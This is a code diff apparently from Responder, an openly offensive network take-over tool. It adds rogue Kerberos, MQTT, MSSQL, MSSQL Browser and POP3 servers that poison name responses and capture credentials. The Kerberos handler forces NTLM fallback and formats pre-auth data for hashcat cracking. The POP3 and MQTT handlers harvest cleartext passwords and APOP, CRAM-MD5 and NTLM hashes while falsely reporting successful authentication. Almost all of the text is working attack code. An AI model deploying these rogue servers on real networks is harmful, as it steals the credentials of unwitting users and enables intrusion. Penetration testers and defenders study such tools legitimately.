+					# Client sent pre-auth data - extract the encrypted timestamp
+					etype_num, cipher_hex = extract_encrypted_timestamp(data)
+					
+					if etype_num and cipher_hex:
+						etype_name = ENCRYPTION_TYPES.get(bytes([etype_num]), 'unknown')
+						
+						if settings.Config.Verbose:
+							print(text('[KERB] AS-REQ with PA-ENC-TIMESTAMP from %s@%s (etype: %s)' % (cname, realm, etype_name)))
+						
+						# Build the hash in hashcat format
+						if etype_num == 0x17 or etype_num == 0x18:  # RC4 (23 = 0x17, 24 = 0x18)
+							if len(cipher_hex) >= 32:
+								first_16_bytes = cipher_hex[0:32]
+								rest = cipher_hex[32:]
+								flipped_hash = rest + first_16_bytes
+								hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, flipped_hash)
+							else:
+								hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, cipher_hex)
+								
+						elif etype_num == 0x12:  # AES256 (18) - hashcat mode 19900
+							# Format: $krb5pa$18$user$realm$cipher (hashcat computes salt internally)
+							hash_value = '$krb5pa$18$%s$%s$%s' % (cname, realm, cipher_hex)
+						elif etype_num == 0x11:  # AES128 (17) - hashcat mode 19800
+							# Format: $krb5pa$17$user$realm$cipher (hashcat computes salt internally)
+							hash_value = '$krb5pa$17$%s$%s$%s' % (cname, realm, cipher_hex)
+						else:
+							hash_value = '$krb5pa$%d$%s$%s$%s' % (etype_num, cname, realm, cipher_hex)
+						
+						# Log to database
+						SaveToDb({
+							'module': 'Kerberos',
+							'type': 'AS-REQ',
+							'client': self.client_address[0],
+							'user': cname,
+							'domain': realm,
+							'hash': hash_value,
+							'fullhash': hash_value
+						})
+						
+						# Print the hash
+						if etype_num == 0x17 or etype_num == 0x18:
+							print(color('[KERB] Kerberos Pre-Auth (hashcat -m 7500): %s' % hash_value, 3, 1))
+						elif etype_num == 0x12:
+							print(color('[KERB] Kerberos Pre-Auth (hashcat -m 19900): %s' % hash_value, 3, 1))
+						elif etype_num == 0x11:
+							print(color('[KERB] Kerberos Pre-Auth (hashcat -m 19800): %s' % hash_value, 3, 1))
+						else:
+							print(color('[KERB] Kerberos 5 AS-REQ (etype %d): %s' % (etype_num, hash_value), 3, 1))
+					else:
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ with PA-DATA but could not extract hash from %s@%s' % (cname, realm), 1, 1))
+				else:
+					# First AS-REQ without pre-auth
+					if kerberos_mode == 'FORCE_NTLM':
+						# Force NTLM fallback mode
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ from %s@%s - forcing NTLM fallback' % (cname, realm), 2, 1))
+						
+						# Build KRB-ERROR with ETYPE_NOSUPP
+						krb_error = build_krb_error_force_ntlm(realm, cname)
+						
+						# Send directly (no Record Mark for UDP)
+						socket_obj.sendto(krb_error, self.client_address)
+						
+						if settings.Config.Verbose:
+							print(color('[KERB] Sent KDC_ERR_ETYPE_NOSUPP - client should fall back to NTLM', 3, 1))
+						
+						# Log to database
+						SaveToDb({
+							'module': 'Kerberos',
+							'type': 'NTLM-Fallback-Forced',
+							'client': self.client_address[0],
+							'user': cname,
+							'domain': realm,
+							'fullhash': '%s@%s - NTLM fallback forced' % (cname, realm)
+						})
+					else:
+						# Default CAPTURE mode - send pre-auth required
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ from %s@%s - sending PREAUTH_REQUIRED' % (cname, realm), 2, 1))
+						
+						# Build KRB-ERROR response
+						krb_error = build_krb_error(realm, cname)
+						
+						# Send directly (no Record Mark for UDP)
+						socket_obj.sendto(krb_error, self.client_address)
+						
+						if settings.Config.Verbose:
+							print(color('[KERB] Sent KRB-ERROR (PREAUTH_REQUIRED) to %s' % self.client_address[0], 2, 1))
+			
+			elif msg_type == 12:  # TGS-REQ
+				if settings.Config.Verbose:
+					print(text('[KERB] TGS-REQ from %s@%s (ignoring)' % (cname, realm)))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[KERB] Error: %s' % str(e)))

servers/MQTT.py

@@ -0,0 +1,205 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+from utils import settings, NetworkSendBufferPython2or3, SaveToDb
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import MQTTv3v4ResponsePacket, MQTTv5ResponsePacket
+
+#Read N byte integer
+def readInt(data, offset, numberOfBytes):
+	value = int.from_bytes(data[offset:offset+numberOfBytes], 'big')
+	offset += numberOfBytes
+	return (value, offset)
+
+#Read binary data
+def readBinaryData(data, offset):
+
+	#Read number of bytes
+	length, offset = readInt(data, offset, 2)
+
+	#Read bytes
+	value = data[offset:offset+length]
+	offset += length
+
+	return (value, offset)
+
+#Same as readBinaryData() but without reading data
+def skipBinaryDataString(data, offset):
+	length, offset = readInt(data, offset, 2)
+	offset += length
+	return offset
+
+#Read UTF-8 encoded string
+def readString(data, offset):
+	value, offset = readBinaryData(data, offset)
+
+	return (value.decode('utf-8'), offset)
+
+#Read variable byte integer
+#(https://docs.oasis-open.org/mqtt/mqtt/v5.0/os/mqtt-v5.0-os.html#_Toc3901011)
+def readVariableByteInteger(data, offset):
+	multiplier = 1
+	value = 0
+	while True:
+		encodedByte = data[offset]
+		offset += 1
+
+		value = (encodedByte & 127) * multiplier
+
+		if (multiplier > 128 * 128 * 128):
+			return None
+
+		multiplier *= 128
+
+		if(encodedByte & 128 == 0):
+			break
+	
+	return (value, offset)
+
+class MqttPacket:
+
+	USERNAME_FLAG = 0x80
+	PASSWORD_FLAG = 0x40
+	WILL_FLAG = 0x04
+
+	def __init__(self, data):
+		self.__isValid = True
+
+		controllPacketType, offset = readInt(data, 0, 1)
+
+		#check if CONNECT packet type
+		if controllPacketType != 0x10:
+			self.__isValid = False
+			return
+
+		#Remaining length
+		remainingLength, offset = readVariableByteInteger(data, offset)
+
+		#Protocol name
+		protocolName, offset = readString(data, offset)
+
+		#Check protocol name
+		if protocolName != "MQTT" and protocolName != "MQIsdp":
+			self.__isValid = False
+			return
+
+		#Check protocol version
+		self.__protocolVersion, offset = readInt(data, offset, 1)
+
+		#Read connect flag register
+		connectFlags, offset = readInt(data, offset, 1)
+
+		#Read keep alive (skip)
+		offset += 2
+
+		#MQTTv5 implements properties
+		if self.__protocolVersion > 4:
+			
+			#Skip all properties
+			propertiesLength, offset = readVariableByteInteger(data, offset)
+			offset+=propertiesLength
+		
+		#Get Client ID
+		self.clientId, offset = readString(data, offset)
+
+		if (self.clientId == ""):
+			self.clientId = "<Empty>"
+
+		#Skip Will
+		if (connectFlags & self.WILL_FLAG) > 0:
+
+			#MQTT v5 implements properties
+			if self.__protocolVersion > 4:
+				willProperties, offset = readVariableByteInteger(data, offset)
+			
+			#Skip will properties
+			offset = skipBinaryDataString(data, offset)
+			offset = skipBinaryDataString(data, offset)
+	
+		#Get Username
+		if (connectFlags & self.USERNAME_FLAG) > 0:
+			self.username, offset = readString(data, offset)
+		else:
+			self.username = "<Empty>"
+
+		#Get Password
+		if (connectFlags & self.PASSWORD_FLAG) > 0:
+			self.password, offset = readString(data, offset)
+		else:
+			self.password = "<Empty>"
+
+	def isValid(self):
+		return self.__isValid
+
+	def getProtocolVersion(self):
+		return self.__protocolVersion
+
+	def data(self, client):
+
+		return {
+			'module': 'MQTT',
+			'type': 'Cleartext',
+			'client': client,
+			'hostname': self.clientId,
+			'user': self.username,
+			'cleartext': self.password,
+			'fullhash': self.username + ':' + self.password
+		}
+
+class MQTT(BaseRequestHandler):
+	def handle(self):
+
+		CONTROL_PACKET_TYPE_CONNECT = 0x10
+
+		try:
+			data = self.request.recv(2048)
+
+			#Read control packet type
+			controlPacketType, offset = readInt(data, 0, 1)
+
+			#Skip non CONNECT packets
+			if controlPacketType != CONTROL_PACKET_TYPE_CONNECT:
+				return
+			
+			#Parse connect packet
+			packet = MqttPacket(data)
+			
+			#Skip if it contains invalid data
+			if not packet.isValid():
+				#Return response
+				return
+
+			#Send response packet
+			if packet.getProtocolVersion() < 5:
+				responsePacket = MQTTv3v4ResponsePacket()
+			else:
+				responsePacket = MQTTv5ResponsePacket()
+
+			self.request.send(NetworkSendBufferPython2or3(responsePacket))
+				
+			#Save to DB
+			SaveToDb(packet.data(self.client_address[0]))
+
+
+		except Exception:
+			self.request.close()
+			pass

servers/MSSQL.py

@@ -14,10 +14,16 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from SocketServer import BaseRequestHandler
-from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
-from utils import *
+import random
 import struct
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
+
 
 class TDS_Login_Packet:
 	def __init__(self, data):
@@ -40,7 +46,7 @@ class TDS_Login_Packet:
 		LocaleLen         = struct.unpack('<h', data[74:76])[0]
 		DatabaseNameOff   = struct.unpack('<h', data[76:78])[0]
 		DatabaseNameLen   = struct.unpack('<h', data[78:80])[0]
-
+		data = NetworkRecvBufferPython2or3(data)
 		self.ClientName   = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
 		self.UserName     = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
 		self.Password     = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
@@ -51,28 +57,26 @@ class TDS_Login_Packet:
 		self.Locale       = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
 		self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
 
-
-def ParseSQLHash(data, client):
+def ParseSQLHash(data, client, Challenge):
 	SSPIStart     = data[8:]
-
 	LMhashLen     = struct.unpack('<H',data[20:22])[0]
 	LMhashOffset  = struct.unpack('<H',data[24:26])[0]
-	LMHash        = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-	
+	LMHash        = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash        = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
 	NthashLen     = struct.unpack('<H',data[30:32])[0]
 	NthashOffset  = struct.unpack('<H',data[32:34])[0]
-	NTHash        = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
+	NTHash        = SSPIStart[NthashOffset:NthashOffset+NthashLen]
+	NTHash        = codecs.encode(NTHash, 'hex').upper().decode('latin-1')
 	DomainLen     = struct.unpack('<H',data[36:38])[0]
 	DomainOffset  = struct.unpack('<H',data[40:42])[0]
-	Domain        = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+	Domain        = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
 	
 	UserLen       = struct.unpack('<H',data[44:46])[0]
 	UserOffset    = struct.unpack('<H',data[48:50])[0]
-	User          = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
+	User          = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
 
 	if NthashLen == 24:
-		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, settings.Config.NumChal)
+		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, codecs.encode(Challenge,'hex').decode('latin-1'))
 
 		SaveToDb({
 			'module': 'MSSQL', 
@@ -84,7 +88,7 @@ def ParseSQLHash(data, client):
 		})
 
 	if NthashLen > 60:
-		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
+		WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), NTHash[:32], NTHash[32:])
 		
 		SaveToDb({
 			'module': 'MSSQL', 
@@ -98,10 +102,10 @@ def ParseSQLHash(data, client):
 
 def ParseSqlClearTxtPwd(Pwd):
 	Pwd = map(ord,Pwd.replace('\xa5',''))
-	Pw = ''
+	Pw = b''
 	for x in Pwd:
-		Pw += hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')
-	return Pw
+		Pw += codecs.decode(hex(x ^ 0xa5)[::-1][:2].replace("x", "0"), 'hex')
+	return Pw.decode('latin-1')
 
 
 def ParseClearTextSQLPass(data, client):
@@ -119,32 +123,64 @@ def ParseClearTextSQLPass(data, client):
 # MSSQL Server class
 class MSSQL(BaseRequestHandler):
 	def handle(self):
-		if settings.Config.Verbose:
-			print text("[MSSQL] Received connection from %s" % self.client_address[0])
 	
 		try:
+			self.ntry = 0
 			while True:
 				data = self.request.recv(1024)
-				self.request.settimeout(0.1)
+				self.request.settimeout(1)
+				Challenge = RandomChallenge()
 
-
-				if data[0] == "\x12":  # Pre-Login Message
+				if not data:
+					break
+				if settings.Config.Verbose:
+					print(text("[MSSQL] Received connection from %s" % self.client_address[0].replace("::ffff:","")))
+				if data[0] == b"\x12" or data[0] == 18:  # Pre-Login Message
 					Buffer = str(MSSQLPreLoginAnswer())
-					self.request.send(Buffer)
+					self.request.send(NetworkSendBufferPython2or3(Buffer))
 					data = self.request.recv(1024)
 
-				if data[0] == "\x10":  # NegoSSP
-					if re.search("NTLMSSP",data):
-						Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
+				if data[0] == b"\x10" or data[0] == 16:  # NegoSSP
+					if re.search(b'NTLMSSP',data):
+						Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
 						Packet.calculate()
 						Buffer = str(Packet)
-						self.request.send(Buffer)
+						self.request.send(NetworkSendBufferPython2or3(Buffer))
 						data = self.request.recv(1024)
 					else:
 						ParseClearTextSQLPass(data,self.client_address[0])
 
-				if data[0] == "\x11":  # NegoSSP Auth
-					ParseSQLHash(data,self.client_address[0])
+				if data[0] == b'\x11' or data[0] == 17:  # NegoSSP Auth
+					ParseSQLHash(data,self.client_address[0],Challenge)
 
-		except socket.timeout:
-			self.request.close()
+		except:
+			pass
+
+# MSSQL Server Browser class
+# See "[MC-SQLR]: SQL Server Resolution Protocol": https://msdn.microsoft.com/en-us/library/cc219703.aspx
+class MSSQLBrowser(BaseRequestHandler):
+	def handle(self):
+		if settings.Config.Verbose:
+			print(text("[MSSQL-BROWSER] Received request from %s" % self.client_address[0]))
+
+		data, soc = self.request
+
+		if data:
+			if data[0] in b'\x02\x03': # CLNT_BCAST_EX / CLNT_UCAST_EX
+				self.send_response(soc, "MSSQLSERVER")
+			elif data[0:1] == b'\x04': # CLNT_UCAST_INST
+				self.send_response(soc, data[1:].rstrip(b"\x00"))
+			elif data[0:1] == b'\x0F': # CLNT_UCAST_DAC
+				self.send_dac_response(soc)
+
+	def send_response(self, soc, inst):
+		print(text("[MSSQL-BROWSER] Sending poisoned response to %s" % self.client_address[0]))
+
+		server_name = ''.join(chr(random.randint(ord('A'), ord('Z'))) for _ in range(random.randint(12, 20)))
+		resp = "ServerName;%s;InstanceName;%s;IsClustered;No;Version;12.00.4100.00;tcp;1433;;" % (server_name, inst)
+		soc.sendto(struct.pack("<BH", 0x05, len(resp)) + NetworkSendBufferPython2or3(resp), self.client_address)
+
+	def send_dac_response(self, soc):
+		print(text("[MSSQL-BROWSER] Sending poisoned DAC response to %s" % self.client_address[0]))
+
+		soc.sendto(NetworkSendBufferPython2or3(struct.pack("<BHBH", 0x05, 0x06, 0x01, 1433)), self.client_address)

servers/POP3.py

@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 # This file is part of Responder, a network take-over set of tools 
 # created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
+# email: lgaffie@secorizon.com
 # This program is free software: you can redistribute it and/or modify
 # it under the terms of the GNU General Public License as published by
 # the Free Software Foundation, either version 3 of the License, or
@@ -15,34 +15,440 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 from utils import *
-from SocketServer import BaseRequestHandler
-from packets import POPOKPacket
+import base64
+import hashlib
+import codecs
+import struct
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+from packets import POPOKPacket, POPNotOKPacket
 
-# POP3 Server class
 class POP3(BaseRequestHandler):
+	"""POP3 server with multiple authentication methods"""
+	
+	def __init__(self, *args, **kwargs):
+		self.challenge = None
+		self.username = None
+		BaseRequestHandler.__init__(self, *args, **kwargs)
+	
+	def generate_challenge(self):
+		"""Generate challenge for APOP and CRAM-MD5"""
+		import time
+		import random
+		timestamp = int(time.time())
+		random_data = random.randint(1000, 9999)
+		# APOP format: <process-id.clock@hostname>
+		self.challenge = "<%d.%d@%s>" % (random_data, timestamp, settings.Config.MachineName)
+		return self.challenge
+	
+	def send_packet(self, packet):
+		"""Send a packet to client"""
+		self.request.send(NetworkSendBufferPython2or3(packet))
+	
+	def send_ok(self, message=""):
+		"""Send +OK response"""
+		if message:
+			response = "+OK %s\r\n" % message
+		else:
+			response = "+OK\r\n"
+		self.request.send(response.encode('latin-1'))
+	
+	def send_err(self, message=""):
+		"""Send -ERR response"""
+		if message:
+			response = "-ERR %s\r\n" % message
+		else:
+			response = "-ERR\r\n"
+		self.request.send(response.encode('latin-1'))
+	
+	def send_continue(self, data=""):
+		"""Send continuation (+) response for multi-line auth"""
+		if data:
+			response = "+ %s\r\n" % data
+		else:
+			response = "+\r\n"
+		self.request.send(response.encode('latin-1'))
+	
+	def handle_apop(self, data):
+		"""Handle APOP authentication (MD5 challenge-response)"""
+		# APOP username digest
+		# digest is MD5(challenge + password)
+		try:
+			parts = data.strip().split(b' ', 2)
+			if len(parts) < 3:
+				return False
+			
+			username = parts[1].decode('latin-1')
+			digest = parts[2].decode('latin-1').lower()
+			
+			# Format for hashcat/john: username:$apop$challenge$digest
+			hash_string = "%s:$apop$%s$%s" % (username, self.challenge, digest)
+			
+			SaveToDb({
+				'module': 'POP3',
+				'type': 'APOP',
+				'client': self.client_address[0],
+				'user': username,
+				'hash': digest,
+				'fullhash': hash_string,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [POP3] Captured APOP digest from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing APOP: %s' % str(e)))
+			return False
+	
+	def handle_auth_plain(self, data):
+		"""Handle AUTH PLAIN (base64 encoded username/password)"""
+		try:
+			# AUTH PLAIN can be sent as:
+			# AUTH PLAIN <base64>
+			# or
+			# AUTH PLAIN
+			# <base64>
+			
+			if len(data.strip().split(b' ')) > 2:
+				# Inline format
+				auth_data = data.strip().split(b' ', 2)[2]
+			else:
+				# Need to read next line
+				self.send_continue()
+				auth_data = self.request.recv(1024).strip()
+			
+			# Decode base64
+			decoded = base64.b64decode(auth_data)
+			# Format: [authzid]\x00username\x00password
+			parts = decoded.split(b'\x00')
+			
+			if len(parts) >= 3:
+				username = parts[1].decode('latin-1', errors='ignore')
+				password = parts[2].decode('latin-1', errors='ignore')
+			elif len(parts) == 2:
+				username = parts[0].decode('latin-1', errors='ignore')
+				password = parts[1].decode('latin-1', errors='ignore')
+			else:
+				return False
+			
+			SaveToDb({
+				'module': 'POP3',
+				'type': 'AUTH-PLAIN',
+				'client': self.client_address[0],
+				'user': username,
+				'cleartext': password,
+				'fullhash': username + ":" + password,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [POP3] Captured AUTH PLAIN credentials from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 2, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing AUTH PLAIN: %s' % str(e)))
+			return False
+	
+	def handle_auth_login(self, data):
+		"""Handle AUTH LOGIN (two-stage base64 authentication)"""
+		try:
+			# AUTH LOGIN is two-stage:
+			# Client: AUTH LOGIN
+			# Server: + VXNlcm5hbWU6  (base64 "Username:")
+			# Client: <base64 username>
+			# Server: + UGFzc3dvcmQ6  (base64 "Password:")
+			# Client: <base64 password>
+			
+			# Send "Username:" prompt
+			self.send_continue(base64.b64encode(b"Username:").decode('latin-1'))
+			username_b64 = self.request.recv(1024).strip()
+			
+			if not username_b64:
+				return False
+			
+			username = base64.b64decode(username_b64).decode('latin-1', errors='ignore')
+			
+			# Send "Password:" prompt
+			self.send_continue(base64.b64encode(b"Password:").decode('latin-1'))
+			password_b64 = self.request.recv(1024).strip()
+			
+			if not password_b64:
+				return False
+			
+			password = base64.b64decode(password_b64).decode('latin-1', errors='ignore')
+			
+			SaveToDb({
+				'module': 'POP3',
+				'type': 'AUTH-LOGIN',
+				'client': self.client_address[0],
+				'user': username,
+				'cleartext': password,
+				'fullhash': username + ":" + password,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [POP3] Captured AUTH LOGIN credentials from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 2, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing AUTH LOGIN: %s' % str(e)))
+			return False
+	
+	def handle_auth_cram_md5(self, data):
+		"""Handle AUTH CRAM-MD5 (challenge-response)"""
+		try:
+			# Generate challenge
+			import time
+			challenge = "<%d.%d@%s>" % (os.getpid(), int(time.time()), settings.Config.MachineName)
+			challenge_b64 = base64.b64encode(challenge.encode('latin-1')).decode('latin-1')
+			
+			# Send challenge
+			self.send_continue(challenge_b64)
+			
+			# Receive response
+			response_b64 = self.request.recv(1024).strip()
+			if not response_b64:
+				return False
+			
+			response = base64.b64decode(response_b64).decode('latin-1', errors='ignore')
+			# Response format: username<space>digest
+			parts = response.split(' ', 1)
+			
+			if len(parts) < 2:
+				return False
+			
+			username = parts[0]
+			digest = parts[1].lower()
+			
+			# Format for hashcat: $cram_md5$challenge$digest$username
+			hash_string = "%s:$cram_md5$%s$%s" % (username, challenge, digest)
+			
+			SaveToDb({
+				'module': 'POP3',
+				'type': 'CRAM-MD5',
+				'client': self.client_address[0],
+				'user': username,
+				'hash': digest,
+				'fullhash': hash_string,
+			})
+			
+			if settings.Config.Verbose:
+				print(color("[*] [POP3] Captured CRAM-MD5 hash from %s for user %s" % (
+					self.client_address[0].replace("::ffff:", ""), username), 3, 1))
+			
+			return True
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing CRAM-MD5: %s' % str(e)))
+			return False
+	
+	def handle_ntlm_auth(self, data):
+		"""Handle NTLM authentication"""
+		try:
+			# Check for NTLMSSP NEGOTIATE
+			if b'NTLMSSP\x00\x01' in data:
+				# Generate NTLM challenge
+				challenge = RandomChallenge()
+				
+				# Build NTLMSSP CHALLENGE
+				ntlm_challenge = b'NTLMSSP\x00'
+				ntlm_challenge += struct.pack('<I', 2)  # Type 2
+				ntlm_challenge += struct.pack('<HHI', 0, 0, 0)  # Target name
+				ntlm_challenge += struct.pack('<I', 0x00008201)  # Flags
+				ntlm_challenge += challenge  # Server challenge
+				ntlm_challenge += b'\x00' * 8  # Reserved
+				ntlm_challenge += struct.pack('<HHI', 0, 0, 0)  # Target info
+				
+				# Send challenge (base64 encoded in continuation)
+				challenge_b64 = base64.b64encode(ntlm_challenge).decode('latin-1')
+				self.send_continue(challenge_b64)
+				
+				# Receive NTLMSSP AUTH
+				auth_b64 = self.request.recv(2048).strip()
+				if not auth_b64 or auth_b64 == b'*':
+					return False
+				
+				auth_data = base64.b64decode(auth_b64)
+				
+				# Parse NTLMSSP AUTH
+				if auth_data[0:8] != b'NTLMSSP\x00':
+					return False
+				
+				msg_type = struct.unpack('<I', auth_data[8:12])[0]
+				if msg_type != 3:
+					return False
+				
+				# Parse fields
+				lm_len = struct.unpack('<H', auth_data[12:14])[0]
+				lm_offset = struct.unpack('<I', auth_data[16:20])[0]
+				
+				ntlm_len = struct.unpack('<H', auth_data[20:22])[0]
+				ntlm_offset = struct.unpack('<I', auth_data[24:28])[0]
+				
+				domain_len = struct.unpack('<H', auth_data[28:30])[0]
+				domain_offset = struct.unpack('<I', auth_data[32:36])[0]
+				
+				user_len = struct.unpack('<H', auth_data[36:38])[0]
+				user_offset = struct.unpack('<I', auth_data[40:44])[0]
+				
+				# Extract data
+				username = auth_data[user_offset:user_offset+user_len].decode('utf-16-le', errors='ignore')
+				domain = auth_data[domain_offset:domain_offset+domain_len].decode('utf-16-le', errors='ignore')
+				lm_hash = auth_data[lm_offset:lm_offset+lm_len]
+				ntlm_hash = auth_data[ntlm_offset:ntlm_offset+ntlm_len]
+				
+				# Determine version
+				if ntlm_len == 24:
+					hash_type = "NTLMv1"
+					hash_string = "%s::%s:%s:%s:%s" % (
+						username, domain,
+						codecs.encode(lm_hash, 'hex').decode('latin-1'),
+						codecs.encode(ntlm_hash, 'hex').decode('latin-1'),
+						codecs.encode(challenge, 'hex').decode('latin-1')
+					)
+				elif ntlm_len > 24:
+					hash_type = "NTLMv2"
+					hash_string = "%s::%s:%s:%s:%s" % (
+						username, domain,
+						codecs.encode(challenge, 'hex').decode('latin-1'),
+						codecs.encode(ntlm_hash[:16], 'hex').decode('latin-1'),
+						codecs.encode(ntlm_hash[16:], 'hex').decode('latin-1')
+					)
+				else:
+					return False
+				
+				SaveToDb({
+					'module': 'POP3',
+					'type': hash_type + '-SSP',
+					'client': self.client_address[0],
+					'user': domain + '\\' + username,
+					'hash': codecs.encode(ntlm_hash, 'hex').decode('latin-1'),
+					'fullhash': hash_string,
+				})
+				
+				if settings.Config.Verbose:
+					print(color("[*] [POP3] Captured %s hash from %s for user %s\\%s" % (
+						hash_type, self.client_address[0].replace("::ffff:", ""), domain, username), 3, 1))
+				
+				return True
+			
+			return False
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[POP3] Error parsing NTLM: %s' % str(e)))
+			return False
+	
 	def SendPacketAndRead(self):
+		"""Send OK packet and read response"""
 		Packet = POPOKPacket()
-		self.request.send(str(Packet))
+		self.request.send(NetworkSendBufferPython2or3(Packet))
 		return self.request.recv(1024)
-
+	
 	def handle(self):
 		try:
-			data = self.SendPacketAndRead()
-
-			if data[0:4] == "USER":
-				User = data[5:].replace("\r\n","")
-				data = self.SendPacketAndRead()
-			if data[0:4] == "PASS":
-				Pass = data[5:].replace("\r\n","")
-
-				SaveToDb({
-					'module': 'POP3', 
-					'type': 'Cleartext', 
-					'client': self.client_address[0], 
-					'user': User, 
-					'cleartext': Pass, 
-					'fullhash': User+":"+Pass,
-				})
-			self.SendPacketAndRead()
-		except Exception:
+			# Generate challenge for APOP
+			challenge = self.generate_challenge()
+			
+			# Send banner with challenge for APOP support
+			banner = "+OK POP3 server ready %s\r\n" % challenge
+			self.request.send(banner.encode('latin-1'))
+			
+			# Read first command
+			data = self.request.recv(1024)
+			
+			# Handle CAPA (capability) command
+			if data[0:4].upper() == b'CAPA':
+				# Advertise supported auth methods
+				capabilities = [
+					"+OK Capability list follows",
+					"USER",
+					"SASL PLAIN LOGIN CRAM-MD5 NTLM",
+					"IMPLEMENTATION Responder POP3",
+					"."
+				]
+				self.request.send("\r\n".join(capabilities).encode('latin-1') + b"\r\n")
+				data = self.request.recv(1024)
+			
+			# Handle AUTH command
+			if data[0:4].upper() == b'AUTH':
+				mechanism = data[5:].strip().upper()
+				
+				if mechanism == b'PLAIN':
+					self.handle_auth_plain(data)
+					self.send_ok("Authentication successful")
+					return
+				
+				elif mechanism == b'LOGIN':
+					self.handle_auth_login(data)
+					self.send_ok("Authentication successful")
+					return
+				
+				elif mechanism == b'CRAM-MD5' or mechanism.startswith(b'CRAM'):
+					self.handle_auth_cram_md5(data)
+					self.send_ok("Authentication successful")
+					return
+				
+				elif mechanism == b'NTLM':
+					if self.handle_ntlm_auth(data):
+						self.send_ok("Authentication successful")
+					else:
+						self.send_err("Authentication failed")
+					return
+				
+				elif not mechanism:
+					# AUTH without mechanism - list supported
+					auth_list = "+OK Supported mechanisms:\r\nPLAIN\r\nLOGIN\r\nCRAM-MD5\r\nNTLM\r\n.\r\n"
+					self.request.send(auth_list.encode('latin-1'))
+					data = self.request.recv(1024)
+				else:
+					self.send_err("Unsupported authentication method")
+					return
+			
+			# Handle APOP command
+			if data[0:4].upper() == b'APOP':
+				if self.handle_apop(data):
+					self.send_ok("Authentication successful")
+				else:
+					self.send_err("Authentication failed")
+				return
+			
+			# Handle traditional USER/PASS
+			if data[0:4].upper() == b'USER':
+				User = data[5:].strip(b"\r\n").decode("latin-1", errors='ignore')
+				self.send_ok("Password required")
+				data = self.request.recv(1024)
+				
+				if data[0:4].upper() == b'PASS':
+					Pass = data[5:].strip(b"\r\n").decode("latin-1", errors='ignore')
+					
+					SaveToDb({
+						'module': 'POP3',
+						'type': 'Cleartext',
+						'client': self.client_address[0],
+						'user': User,
+						'cleartext': Pass,
+						'fullhash': User + ":" + Pass,
+					})
+					
+					if settings.Config.Verbose:
+						print(color("[*] [POP3] Captured cleartext credentials from %s for user %s" % (
+							self.client_address[0].replace("::ffff:", ""), User), 2, 1))
+					
+					self.send_ok("Authentication successful")
+					return
+			
+			self.send_err("Unknown command")
+			
